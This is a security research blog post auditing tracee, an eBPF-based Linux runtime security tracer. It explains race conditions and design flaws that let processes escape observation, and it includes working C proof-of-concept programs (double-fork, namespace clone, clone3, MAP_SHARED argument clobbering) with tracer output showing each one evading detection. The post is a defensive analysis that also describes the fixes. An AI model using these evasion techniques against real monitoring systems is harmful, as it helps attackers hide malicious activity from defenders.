Having been in the game of auditing kprobe-based tracers for the past couple of years, and in light of an upcoming DEF CON talk on eBPF tracer race conditions (which you should go watch) being given by a friend of mine from the NYU(-Poly) (OSIR)IS(IS) lab, I figured I would wax poetic on some of the more amusing issues that tracee, Aqua Security’s “Runtime Security and Forensics” framework for Linux, used to have, along with other general issues that anyone attempting to write a production-ready tracer should be aware of. These come up frequently whenever we look at Linux tracers. This post assumes some familiarity with writing eBPF-based tracing tools; if you haven’t played with eBPF yet, consider poking around your kernel and system processes with bpftrace or bcc.
tl;dr In this post, we discuss an insecure coding pattern commonly used in system observability and program analysis tools, and several techniques that enable one to evade observation by tools built on that pattern, especially when they are used for security event analysis. We also discuss several ways in which such software can be written that do not permit such evasion, and the current limitations that make it more difficult than necessary to write such code correctly.
As we’ve mentioned before,1 one does not simply trace fork(2) or clone(2), because the child process is actually started (from a CoW snapshot of the caller process) before the syscall has actually returned to the caller. This is a problem because any tracer that waits for the return value of fork(2)/clone(2)/etc. to start watching the PID will invariably lose some of the initial operations of the child >99% of the time. While this is not a “problem” for most applications’ behavior, it becomes troublesome for monitoring systems that follow individual process hierarchies live, rather than all processes globally and retroactively: anyone can simply “double-fork” in rapid succession to throw off the yoke of inspection, since the second fork(2) will be missed ~100% of the time (even when implementing the bypass in C).
// $ gcc -std=c11 -Wall -Wextra -pedantic -o double-fork double-fork.c
// $ ./double-fork <iterations> </path/to/binary>
#include <stdlib.h>
#include <stdio.h>
#include <sys/types.h>
#include <unistd.h>

int main(int argc, char** argv, char** envp) {
  if (argc < 3) {
    return 1;
  }
  int loop = atoi(argv[1]);
  for (int i=0; i < loop; i++) {
    pid_t p = fork();
    if (p != 0) {
      return 0;
    }
  }
  return execve(argv[2], &argv[2], envp);
}
/tracee/dockerer/tracee.main/dist # ./tracee --trace process:follow --filter pid=48478 -e execve -e clone
TIME(s)        UID  COMM         PID  TID  RET    EVENT   ARGS
111506.067379  0    bash         0    0    50586  clone   flags: CLONE_CHILD_CLEARTID|CLONE_CHILD_SETTID, stack: 0x0, parent_tid: 0x0, child_tid: 0x7F56929630BF, tls: 0
111506.069569  0    bash         0    0    0      execve  pathname: ./double-fork, argv: [./double-fork 100 /usr/bin/id]
111506.077553  0    double-fork  0    0    50590  clone   flags: CLONE_CHILD_CLEARTID|CLONE_CHILD_SETTID, stack: 0x0, parent_tid: 0x0, child_tid: 0x7FF0153690BF, tls: 0
111506.079220  0    double-fork  0    0    50592  clone   flags: CLONE_CHILD_CLEARTID|CLONE_CHILD_SETTID, stack: 0x0, parent_tid: 0x0, child_tid: 0x7FF0153690BF, tls: 0
...
111506.142778  0    double-fork  0    0    50690  clone   flags: CLONE_CHILD_CLEARTID|CLONE_CHILD_SETTID, stack: 0x0, parent_tid: 0x0, child_tid: 0x7FF0153690BF, tls: 0
111506.143236  0    double-fork  0    0    0      execve  pathname: /usr/bin/id, argv: [/usr/bin/id]
...
111514.289461  0    bash         0    0    50699  clone   flags: CLONE_CHILD_CLEARTID|CLONE_CHILD_SETTID, stack: 0x0, parent_tid: 0x0, child_tid: 0x7F56929630BF, tls: 0
111514.293312  0    bash         0    0    0      execve  pathname: ./double-fork, argv: [./double-fork 100 /usr/bin/id]
111514.303955  0    double-fork  0    0    50700  clone   flags: CLONE_CHILD_CLEARTID|CLONE_CHILD_SETTID, stack: 0x0, parent_tid: 0x0, child_tid: 0x7F9CF46280BF, tls: 0
111514.304240  0    double-fork  0    0    50701  clone   flags: CLONE_CHILD_CLEARTID|CLONE_CHILD_SETTID, stack: 0x0, parent_tid: 0x0, child_tid: 0x7F9CF46280BF, tls: 0
...
111514.356522  0    double-fork  0    0    50799  clone   flags: CLONE_CHILD_CLEARTID|CLONE_CHILD_SETTID, stack: 0x0, parent_tid: 0x0, child_tid: 0x7F9CF46280BF, tls: 0
111514.356949  0    double-fork  0    0    0      execve  pathname: /usr/bin/id, argv: [/usr/bin/id]
...
111519.410500  0    double-fork  0    0    50836  clone   flags: CLONE_CHILD_CLEARTID|CLONE_CHILD_SETTID, stack: 0x0, parent_tid: 0x0, child_tid: 0x7F533D0A10BF, tls: 0
111519.411117  0    double-fork  0    0    50837  clone   flags: CLONE_CHILD_CLEARTID|CLONE_CHILD_SETTID, stack: 0x0, parent_tid: 0x0, child_tid: 0x7F533D0A10BF, tls: 0
The start of child execution is triggered from the wake_up_new_task() function called by _do_fork() (now kernel_clone()), the internal kernel function powering all of the fork(2)/clone(2) look-alikes.
pid_t kernel_clone(struct kernel_clone_args *args)
{
	...
	/*
	 * Do this prior waking up the new thread - the thread pointer
	 * might get invalid after that point, if the thread exits quickly.
	 */
	trace_sched_process_fork(current, p);

	pid = get_task_pid(p, PIDTYPE_PID);
	nr = pid_vnr(pid);

	if (clone_flags & CLONE_PARENT_SETTID)
		put_user(nr, args->parent_tid);

	if (clone_flags & CLONE_VFORK) {
		p->vfork_done = &vfork;
		init_completion(&vfork);
		get_task_struct(p);
	}

	wake_up_new_task(p);
	...
In our talk (slides 24-25), we gave a bpftrace example of a fork-exec tracer that would not lose to race conditions.
kprobe:wake_up_new_task
{
  $chld_pid = ((struct task_struct *)arg0)->pid;
  @pids[$chld_pid] = nsecs;
}

tracepoint:syscalls:sys_enter_execve
{
  if (@pids[pid]) {
    $time_diff = ((nsecs - @pids[pid]) / 1000000);
    if ($time_diff <= 10) {
      printf("%s => ", comm);
      join(args->argv);
    }
  }
  delete(@pids[pid]);
}
In general, we prefer to hook wake_up_new_task() with a kprobe since it’s fairly stable and gives raw access to the entire fully-configured child struct task_struct* right before it is started. However, if one does not care about the other metadata accessible from that pointer, nor needs it to be fully initialized (i.e. if one just wants the PID), one can instead hook the sched_process_fork tracepoint event, which is triggered by the trace_sched_process_fork(current, p) call shown above. This is what tracee currently opts to do as of commit 8c944cf07f15045f395f7754f92b7809316c681c (tag v0.5.4).
Additionally, tracing the fork(2)/clone(2)/etc. syscalls directly led to (and still leads to, in any tracer not hooking wake_up_new_task/sched_process_fork) other issues that can present bypasses in the scenario of live child process observation.
The most interesting of these issues is that fork(2)/clone(2)/etc. return PIDs within the context of the PID namespace of the calling process (thread). As a result, the return values of these syscalls cannot meaningfully be used by a kernel-level tracer without also accounting for child pidns PID to host PID mappings. On distros that allow unprivileged user namespaces to be created, arbitrary processes can create nested PID namespaces by first creating a nested user namespace. This can be done in a number of ways, such as via unshare(2), setns(2), or even clone(2) with CLONE_NEWUSER and CLONE_NEWPID.
root@box:~# su -s /bin/bash nobody
nobody@box:/root$ unshare -Urpf --mount-proc
root@box:/root# nano &
[1] 18
root@box:/root# ps aux
USER         PID %CPU %MEM    VSZ   RSS TTY      STAT START   TIME COMMAND
root           1  0.1  0.0   8264  5156 pts/0    S    01:37   0:00 -bash
root          17  0.0  0.0   7108  4132 pts/0    T    01:38   0:00 nano
root          18  0.0  0.0   8892  3344 pts/0    R+   01:38   0:00 ps aux
root@box:/root# unshare -pf --mount-proc
root@box:/root# ps aux
USER         PID %CPU %MEM    VSZ   RSS TTY      STAT START   TIME COMMAND
root           1  1.2  0.0   8264  5200 pts/0    S    01:38   0:00 -bash
root          15  0.0  0.0   8892  3332 pts/0    R+   01:38   0:00 ps aux
// $ gcc -std=c11 -Wall -Wextra -pedantic -o userns-clone-fork userns-clone-fork.c
// $ ./userns-clone-fork </path/to/binary>
#define _GNU_SOURCE
#include <sched.h>
#include <stdlib.h>
#include <stdio.h>
#include <sys/types.h>
#include <unistd.h>

int clone_child(void *arg) {
  char** argv = (char**)arg;
  printf("clone pid: %u\n", getpid());
  pid_t p = fork();
  if (p != 0) {
    return 0;
  }
  printf("fork pid: %u\n", getpid());
  return execve(argv[1], &argv[1], NULL);
}

static char stack[1024*1024];

int main(int argc, char **argv) {
  if (argc < 2) {
    return 1;
  }
  printf("parent pid: %u\n", getpid());
  pid_t p = clone(clone_child, &stack[sizeof(stack)], CLONE_NEWUSER|CLONE_NEWPID, argv);
  if (p == -1) {
    perror("clone");
    exit(1);
  }
  return 0;
}
/tracee/dockerer/tracee.main/dist # ./tracee --trace process:follow --filter pid=54519 -e execve -e clone
TIME(s)        UID  COMM             PID  TID  RET    EVENT   ARGS
117174.563477  0    bash             0    0    55395  clone   flags: CLONE_CHILD_CLEARTID|CLONE_CHILD_SETTID, stack: 0x0, parent_tid: 0x0, child_tid: 0x7F99617200BF, tls: 0
117174.566597  0    bash             0    0    0      execve  pathname: ./userns-clone-fork, argv: [./userns-clone-fork /usr/bin/id]
117174.578037  0    userns-clone-fo  0    0    55396  clone   flags: CLONE_NEWUSER|CLONE_NEWPID, stack: 0x5621B2DBB030, parent_tid: 0x0, child_tid: 0x7F7C130B6285, tls: 18
117174.579600  0    userns-clone-fo  0    0    2      clone   flags: CLONE_CHILD_CLEARTID|CLONE_CHILD_SETTID, stack: 0x0, parent_tid: 0x0, child_tid: 0x7F7C1307A0BF, tls: 0
However, more interestingly, this means that such tracers will not work by default on containers unless the containers run within the host PID namespace, a dangerous configuration. This was the behavior we observed with tracee prior to the aforementioned commit 8c944cf07f15045f395f7754f92b7809316c681c.
Prior to tracee 0.5.4, the PID return values of the fork(2)/clone(2)-alike syscalls were processed with the following code:
SEC("raw_tracepoint/sys_exit")
int tracepoint__raw_syscalls__sys_exit(struct bpf_raw_tracepoint_args *ctx)
{
    long ret = ctx->args[1];
    struct task_struct *task = (struct task_struct *)bpf_get_current_task();
    struct pt_regs *regs = (struct pt_regs*)ctx->args[0];
    int id = READ_KERN(regs->orig_ax);
    ...
    // fork events may add new pids to the traced pids set
    // perform this check after should_trace() to only add forked childs of a traced parent
    if (id == SYS_CLONE || id == SYS_FORK || id == SYS_VFORK) {
        u32 pid = ret;
        bpf_map_update_elem(&traced_pids_map, &pid, &pid, BPF_ANY);
        if (get_config(CONFIG_NEW_PID_FILTER)) {
            bpf_map_update_elem(&new_pids_map, &pid, &pid, BPF_ANY);
        }
    }
In the above snippet, the syscall ID is compared against those of clone(2), fork(2), and vfork(2). However, it is not compared against the ID of clone3(2). While tracee does separately log clone3(2) events (since commit f44eb206bf8e80efeb1da68641cb61f3f00c522c, tag v0.4.0), this omission resulted in clone3(2)-created child processes not being followed prior to commit 8c944cf07f15045f395f7754f92b7809316c681c.
// $ gcc -std=c11 -Wall -Wextra -pedantic -o clone3 clone3.c // $ ./clone3 </path/to/binary> #define _GNU_SOURCE #include <sched.h> #include <linux/sched.h> #include <linux/types.h> #include <stdlib.h> #include <stdint.h> #include <stdio.h> #include <sys/types.h> #include <unistd.h> #include <sys/syscall.h> int clone_child(void *arg) { char** argv = (char**)arg; return execve(argv[1], &argv[1], NULL); } int main(int argc, char **argv) { if (argc < 2) { return 1; } printf("parent pid: %u\n", getpid()); struct clone_args args = {0}; pid_t p = syscall(__NR_clone3, &args, sizeof(struct clone_args)); if (p == -1) { perror("clone3"); return 1; } if (p != 0) { printf("clone pid: %u\n", p); } else { clone_child(argv); } return 0; }
Since that commit, which introduced the change to use sched_process_fork, tracee obtains both the host PID and the in-namespace PID:
SEC("raw_tracepoint/sched_process_fork")
int tracepoint__sched__sched_process_fork(struct bpf_raw_tracepoint_args *ctx)
{
    // Note: we don't place should_trace() here so we can keep track of the cgroups in the system
    struct task_struct *parent = (struct task_struct*)ctx->args[0];
    struct task_struct *child = (struct task_struct*)ctx->args[1];
    int parent_pid = get_task_host_pid(parent);
    int child_pid = get_task_host_pid(child);
    ...
    if (event_chosen(SCHED_PROCESS_FORK) && should_trace()) {
        ...
        int parent_ns_pid = get_task_ns_pid(parent);
        int child_ns_pid = get_task_ns_pid(child);

        save_to_submit_buf(submit_p, (void*)&parent_pid, sizeof(int), INT_T, DEC_ARG(0, *tags));
        save_to_submit_buf(submit_p, (void*)&parent_ns_pid, sizeof(int), INT_T, DEC_ARG(1, *tags));
        save_to_submit_buf(submit_p, (void*)&child_pid, sizeof(int), INT_T, DEC_ARG(2, *tags));
        save_to_submit_buf(submit_p, (void*)&child_ns_pid, sizeof(int), INT_T, DEC_ARG(3, *tags));

        events_perf_submit(ctx);
    }
    return 0;
}
In our CCC talk,2,3 we discussed how there exists a significant time-of-check-to-time-of-use (TOCTTOU) race condition when hooking a syscall entrypoint (e.g. via a kprobe, but also more generally): userland-supplied data that is copied/processed by the hook may change by the time the kernel accesses it as part of the syscall’s implementation.
The main way to get around this issue is to hook internal kernel functions, tracepoints, or LSM hooks so as to access syscall inputs after they have already been copied into kernel memory (and to probe the in-kernel copies). However, this approach is not universally applicable; it only works where such internal anchor points exist. In their absence, one has to rely on the Linux Auditing System (aka auditd), which, in addition to simple raw syscall argument dumps, has its calls directly interleaved within the kernel’s codebase so as to process and log inputs after they have been copied from user memory for processing by the kernel. auditd’s calls are very carefully (read: fragilely) placed to ensure that the values used for filtering and logging are not subject to race conditions, even in cases where data is being read from user memory.
For example, auditd’s execve(2) logging takes the following form for a simple ls -lht /:
type=EXECVE msg=audit(...): argc=4 a0="ls" a1="--color=auto" a2="-lht" a3="/"
This log line is generated by audit_log_execve_info(), reading from apparent userspace memory:
const char __user *p = (const char __user *)current->mm->arg_start;
...
len_tmp = strncpy_from_user(&buf_head[len_buf], p, len_max - len_buf);
However, we can observe that auditd’s execve(2) argument handling is “safe” with the following bpftrace script, which hooks some of the symbol-bearing functions called during an execve(2) syscall:
kprobe:__audit_bprm { printf("__audit_bprm called\n"); }
kprobe:setup_arg_pages { printf("setup_arg_pages called\n"); }
kprobe:do_open_execat { printf("do_open_execat called\n"); }
kprobe:open_exec { printf("open_exec(\"%s\") called\n", str(arg0)); }
kprobe:security_bprm_creds_for_exec { printf("security_bprm_creds_for_exec called\n"); }
# bpftrace trace.bt
Attaching 5 probes...
do_open_execat called
security_bprm_creds_for_exec called
open_exec("/lib64/ld-linux-x86-64.so.2") called
do_open_execat called
setup_arg_pages called
__audit_bprm called
The first do_open_execat() call is the one from bprm_execve(), which is called from do_execveat_common() right after argv is copied into the struct linux_binprm. setup_arg_pages() is called from within a struct linux_binfmt implementation and sets current->mm->arg_start to bprm->p. Lastly, __audit_bprm() is called (from exec_binprm(), itself called from bprm_execve()), which sets the auditd context type to AUDIT_EXECVE, resulting in audit_log_execve_info() being called from audit_log_exit() (via show_special()) to generate the above type=EXECVE log line.
It goes without saying that this is not really something eBPF code could hope to do in any sort of stable manner. One could try to use eBPF to hook a bunch of the auditd-related functions in the kernel, but that probably isn’t very stable either, and any such code would essentially need to re-implement just the useful parts of auditd (extracting inputs, process state, and system state) without the cruft (slow filters, string formatting, and who knows what else) that results in auditd somehow having a syscall overhead upwards of 245%.4
Instead of trying to hook onto __audit_* symbols that are called only when auditd is enabled, we should probably try to find relevant functions or tracepoints in the same context to latch onto, such as trace_sched_process_exec in the case of execve(2).
static int exec_binprm(struct linux_binprm *bprm)
{
	...
	audit_bprm(bprm);
	trace_sched_process_exec(current, old_pid, bprm);
	ptrace_event(PTRACE_EVENT_EXEC, old_vpid);
	proc_exec_connector(current);
	return 0;
}
As it turns out, trace_sched_process_exec is even more necessary than one might initially think. While race conditions when hooking syscalls via kprobes and tracepoints are troublesome, it turns out that userspace can flat out block eBPF from reading syscall inputs if they reside in MAP_SHARED pages. It is worth noting that such tomfoolery is somewhat limited, as it only works against bpf_probe_read(|_user|_kernel) calls made before the page is read by the kernel in a given syscall handler. As a result, a quick “fix” for tracers is to perform such reads when the syscall returns. However, such a “fix” would increase the feasibility of race condition abuse whenever the syscall implementation takes longer than the syscall context switch.
Given that this limitation doesn’t appear to be that well known, it could be considered a bug in the kernel, but it only presents an issue when one is already writing their eBPF tracer in the wrong manner. tracee is not generally vulnerable to MAP_SHARED abuse because it mostly dumps syscall arguments from a raw tracepoint hook on sys_exit. However, for syscalls that don’t normally return, such as execve(2), it resorts to dumping the arguments in its sys_enter raw tracepoint hook, enabling the syscall event to be fooled. Regardless, this is not an issue for tracee, as it implements a hook for the sched_process_exec tracepoint as of commit 6166346e7479bc3b4b417a67a92a2493a30b949e (tag v0.6.0).
// $ gcc -std=c11 -Wall -Wextra -pedantic -o clobber clobber.c -lpthread
#define _GNU_SOURCE
#include <stdlib.h>
#include <stdio.h>
#include <string.h>
#include <stdint.h>
#include <unistd.h>
#include <fcntl.h>
#include <sys/mman.h>
#include <pthread.h>

static char* checker;
static char* key;
static int mode = 1;

//force byte by byte copies
void yoloncpy(volatile char* dst, volatile char* src, size_t n, int r) {
  if (r == 0) {
    for (size_t i = 0; i < n; i++) {
      dst[i] = src[i];
    }
  } else {
    for (size_t i = n; i > 0; i--) {
      dst[i-1] = src[i-1];
    }
  }
}

void* thread1(void* arg) {
  int rev = (int)(uintptr_t)arg;
  uint64_t c = 0;
  while (1) { //c < 8192
    switch (c%2) {
      case 0: {
        yoloncpy(key, "supergood", 10, rev);
        break;
      }
      case 1: {
        yoloncpy(key, "reallybad", 10, rev);
        break;
      }
    }
    c += 1;
  }
  return NULL;
}

void* thread2(void* arg) {
  (void)arg;
  uint64_t c = 0;
  while (1) {
    switch (c%2) {
      case 0: {
        memcpy(key, "supergood", 10);
        break;
      }
      case 1: {
        memcpy(key, "reallybad", 10);
        break;
      }
    }
    c += 1;
  }
  return NULL;
}

int main(int argc, char** argv, char** envp) {
  if (argc < 2) {
    printf("usage: %s <count> [mode]\n", argv[0]);
    return 1;
  }
  int count = atoi(argv[1]);
  if (argc >= 3) {
    mode = atoi(argv[2]);
    if (mode != 1 && mode != 2) {
      printf("invalid mode: %s\n", argv[2]);
      return 1;
    }
  }

  key = mmap(NULL, 32, PROT_READ | PROT_WRITE, MAP_SHARED | MAP_ANONYMOUS, -1, 0);
  if (key == MAP_FAILED) {
    perror("mmap");
    return 1;
  }
  checker = mmap(NULL, 32, PROT_READ | PROT_WRITE, MAP_SHARED | MAP_ANONYMOUS, -1, 0);
  if (checker == MAP_FAILED) {
    perror("mmap2");
    return 1;
  }
  strcpy(key, "supergood");
  strcpy(checker, "./checker");

  char count_str[32] = "0";
  char* nargv[] = {checker, key, count_str, NULL};

  pthread_t t_a;
  pthread_t t_b;
  if (mode == 1) {
    pthread_create(&t_a, NULL, &thread1, (void*)0);
    pthread_create(&t_b, NULL, &thread1, (void*)1);
  } else if (mode == 2) {
    pthread_create(&t_a, NULL, &thread2, NULL);
  }

  int c = 0;
  while (c < count) {
    snprintf(count_str, sizeof(count_str), "%d", c);
    int r = fork();
    if (r == 0) {
      int fd = open(key, 0);
      if (fd >= 0) {
        close(fd);
      }
      execve(checker, nargv, envp);
    } else {
      sleep(1);
    }
    c += 1;
  }
  return 0;
}
# ./dist/tracee-ebpf --trace event=execve,sched_process_exec
UID  COMM     PID   TID   RET  EVENT               ARGS
0    bash     7662  7662  0    execve              pathname: ./clobber, argv: [./clobber 5]
0    clobber  7662  7662  0    sched_process_exec  cmdpath: ./clobber, pathname: /root/clobber, argv: [./clobber 5], dev: 264241153, inode: 5391, invoked_from_kernel: 0
0    clobber  7665  7665  0    execve              argv: []
0    checker  7665  7665  0    sched_process_exec  cmdpath: ./checker, pathname: /root/checker, argv: [./checker rupergood 0], dev: 264241153, inode: 5393, invoked_from_kernel: 0
0    clobber  7666  7666  0    execve              argv: []
0    checker  7666  7666  0    sched_process_exec  cmdpath: ./checker, pathname: /root/checker, argv: [./checker reallybad 1], dev: 264241153, inode: 5393, invoked_from_kernel: 0
0    clobber  7667  7667  0    execve              argv: []
0    checker  7667  7667  0    sched_process_exec  cmdpath: ./checker, pathname: /root/checker, argv: [./checker supergood 2], dev: 264241153, inode: 5393, invoked_from_kernel: 0
0    clobber  7668  7668  0    execve              argv: []
0    checker  7668  7668  0    sched_process_exec  cmdpath: ./checker, pathname: /root/checker, argv: [./checker supergbad 3], dev: 264241153, inode: 5393, invoked_from_kernel: 0
0    clobber  7669  7669  0    execve              argv: []
0    checker  7669  7669  0    sched_process_exec  cmdpath: ./checker, pathname: /root/checker, argv: [./checker reallgood 4], dev: 264241153, inode: 5393, invoked_from_kernel: 0
Note: Interestingly enough, I only stumbled across this behavior because it would have been less effective to use in-process threads to clobber inputs to execve(2), since execve(2) kills all threads other than the one issuing the syscall. The open() call above exists primarily to provide an example for the below test code, which shows how probes from sys_enter fail (with error -14, bad address), but succeed in the sys_exit hook.
SEC("raw_tracepoint/sys_enter")
int sys_enter_hook(struct bpf_raw_tracepoint_args *ctx)
{
    struct pt_regs _regs;
    bpf_probe_read(&_regs, sizeof(_regs), (void*)ctx->args[0]);
    int id = _regs.orig_ax;
    char buf[128];
    if (id == 257) {
        char* const pathname = (char* const)_regs.si;
        bpf_printk("sys_enter -> openat %p\n", pathname);
        bpf_probe_read_str(buf, sizeof(buf), (void*)pathname);
        bpf_printk("sys_enter -> openat %s\n", buf);
    } else if (id == 59) {
        char* const f = (char* const)_regs.di;
        bpf_printk("sys_enter -> execve %p\n", f);
        bpf_probe_read_str(buf, sizeof(buf), (void*)f);
        bpf_printk("sys_enter -> execve %s\n", buf);
    }
    return 0;
}

SEC("raw_tracepoint/sys_exit")
int sys_exit_hook(struct bpf_raw_tracepoint_args *ctx)
{
    struct pt_regs _regs;
    bpf_probe_read(&_regs, sizeof(_regs), (void*)ctx->args[0]);
    int id = _regs.orig_ax;
    char buf[128];
    if (id == 257) {
        char* const pathname = (char* const)_regs.si;
        bpf_printk("sys_exit -> openat %p\n", pathname);
        bpf_probe_read_str(buf, sizeof(buf), (void*)pathname);
        bpf_printk("sys_exit -> openat %s\n", buf);
    } else if (id == 59) {
        char* const f = (char* const)_regs.di;
        bpf_printk("sys_exit -> execve %p\n", f);
        bpf_probe_read_str(buf, sizeof(buf), (void*)f);
        bpf_printk("sys_exit -> execve %s\n", buf);
    }
    return 0;
}
# cat /sys/kernel/tracing/trace_pipe
...
<...>-215084 [000] .... 2266209.468617: 0: sys_enter -> openat 000000005ec00ae4
<...>-215084 [000] .N.. 2266209.468645: 0: sys_enter -> openat
<...>-215084 [000] .... 2266209.469091: 0: sys_exit -> openat 000000005ec00ae4
<...>-215084 [000] .N.. 2266209.469114: 0: sys_exit -> openat supelybad
<...>-215084 [000] .... 2266209.469199: 0: sys_enter -> execve 0000000031d15ade
<...>-215084 [000] .N.. 2266209.469222: 0: sys_enter -> execve
<...>-215084 [000] .... 2266209.470178: 0: sys_exit -> execve 0000000000000000
<...>-215084 [000] .N.. 2266209.470224: 0: sys_exit -> execve
<...>-215084 [000] .... 2266209.472093: 0: sys_enter -> openat 000000008edac6ac
<...>-215084 [000] .N.. 2266209.472138: 0: sys_enter -> openat /etc/ld.so.cache
<...>-215084 [000] .... 2266209.472205: 0: sys_exit -> openat 000000008edac6ac
<...>-215084 [000] .N.. 2266209.472248: 0: sys_exit -> openat /etc/ld.so.cache
<...>-215084 [000] .... 2266209.472345: 0: sys_enter -> openat 000000007671a9c9
<...>-215084 [000] .N.. 2266209.472366: 0: sys_enter -> openat /lib/x86_64-linux-gnu/libc.so.6
<...>-215084 [000] .... 2266209.472420: 0: sys_exit -> openat 000000007671a9c9
<...>-215084 [000] .N.. 2266209.472440: 0: sys_exit -> openat /lib/x86_64-linux-gnu/libc.so.6
...
If you want accurate tracing for syscall events, you probably shouldn’t be hooking the actual syscalls, and especially not the syscall tracepoints. Instead, your only real option is to figure out how to dump the arguments from the internals of a given syscall’s implementation. Depending on whether there are proper hook-points (e.g. tracepoints, LSM hooks, etc.), and whether they provide access to all arguments, it may be necessary to hook internal kernel functions with kprobes for absolute correctness, if that is possible in the first place. For what it’s worth, this is mostly a problem with Linux itself and not something that kprobe-ing kernel modules can fix; though, unlike eBPF, such modules can properly handle kernel structs beyond basic complexity.
In the case of security event auditing, correctness supersedes ease of development, but vendors may not be making that choice, at least not initially. Because of this, auditors must be aware of how their analysis tools actually work and how (and from where) they source event information, so that they can treat the output with a sizable hunk of salt where necessary: while the tools are likely not lying, they may not be capable of telling the truth either.
Olsen, Andy. “Fast and Easy pTracing with eBPF (and not ptrace)” NCC Group Open Forum, NCC Group, September 2019, New York, NY. Presentation.↩︎
Dileo, Jeff; Olsen, Andy. “Kernel Tracing With eBPF: Unlocking God Mode on Linux” 35th Chaos Communication Congress (35C3), Chaos Computer Club (CCC), 30 December 2018, Leipziger Messe, Leipzig, Germany. Conference Presentation.↩︎
https://capsule8.com/blog/auditd-what-is-the-linux-auditing-system/↩︎